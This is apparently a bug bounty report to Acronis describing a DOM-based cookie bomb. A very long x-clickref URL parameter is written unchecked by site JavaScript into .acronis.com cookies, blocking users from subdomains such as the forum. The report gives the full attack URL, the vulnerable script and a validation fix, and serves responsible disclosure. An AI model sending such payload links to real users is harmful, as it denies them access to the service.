DOM Based Cookie Bomb in *.acronis.com via x-clickref GET Parameter

Hi team, I found an issue in **https://www.acronis.com/** that allows attackers to plant a **cookie bomb** via the GET Parameter named **x-clickref**, leading to prevent users to access your services under the scope of ***.acronis.com**. ## Steps To Reproduce 1. Go to **https://www.acronis.com?x-clickref=HEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHEYYYYYYHEHEYYYYYYHaaaaaaaaaaaaaaaaaa** Then, check how you can't access the following services: - **https://forum.acronis.com** - **https://mc-beta-cloud.acronis.com/mc/** Video PoC: {F2218180} ## Cause of the issue Let's examine the script found in **https://www.acronis.com/**: ```javascript (function () { var c = 'x-clickref', d = '.acronis.com', e = '/', a = 90, f = new Date(Date.now() + 86400000 * a); a = [ 'cb_prf_837', 'cb_prf_882' ]; var b = (new URL(window.location.href)).searchParams.get(c); b && a.forEach(function (g) { document.cookie = g + '=' + b + ';domain=' + d + ';path=' + e + ';expires=' + f }) }) (); ``` The previous code will set two cookies in the browser (**cb_prf_837** and **cb_prf_882**) with the value entered in the GET Parameter named **x-clickref**. The issue is that there is no length limitation in the cookie value when setting it. Thus, the attacker can craft a long enough cookie pointing to ***.acronis.com**. As a result, all the requests sent to the scope ***.acronis.com** will then result in HTTP 4XX, causing a DoS on the client-side until the victim delete those cookies. ## Recommendations I don't exactly know what is the expected format of the **x-clickref** parameter. But, to secure this piece of code you can check before setting the cookie if the value contains the format that the application is expecting using a regex expression, or check the **.length** property to avoid cookie bomb attacks. I will like to clarify some things. In your policy states that **Any activity that could lead to the disruption of our service (DoS)** is out of scope. From my perspective when reading it, I understand that you do not want to have reports about DoS in the server-side which may lead to disrupt the correct behavior of your services. Since this is a client-side DoS I decided to let you know about it because your services will continue working correctly, but not from the user-side visiting the previous link. Please, let me know if I am wrong about it. ## Impact Insecure handling of user input when setting cookies leads to prevent the users to access Acronis services under the scope of *.acronis.com